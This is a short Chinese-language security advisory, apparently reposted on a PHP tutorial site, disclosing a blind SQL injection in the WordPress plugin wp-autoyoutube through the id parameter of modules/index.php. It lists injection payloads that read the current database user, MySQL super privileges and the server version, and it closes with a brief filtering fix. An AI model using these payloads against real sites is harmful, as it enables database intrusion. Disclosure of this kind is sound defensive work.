来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: WordPress wp-autoyoutube plugin Blind SQL InjectionVulnerability作者: longrifle0x www.2cto.com软件: Wordpress下载地址:http://wordpress.org/extend/plugins/wp-autoyoutube/测试工具: S......
|
标题: WordPress wp-autoyoutube plugin Blind SQL Injection
Vulnerability 作者: longrifle0x www.2cto.com 软件: Wordpress 下载地址:http://wordpress.org/extend/plugins/wp-autoyoutube/ 测试工具: SQLMAP 概述 Wordpress的插件wp-autoyoutube被发现存在盲注问题 文件: wp-content/plugins/wp-autoyoutube/modules/index.php 测试方法: id=-1; or 1=if *测试* http://www.2cto.com /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][CURRENT_USER() http://www.2cto.com /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) http://www.2cto.com /wp-content/plugins/wp-autoyoutube/modules/index.php[GET][id=-1][MID((VERSION()),1,6) www.2cto.com提供修复方案 wp-content/plugins/wp-autoyoutube/modules/index.php过滤该页面参数输入 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
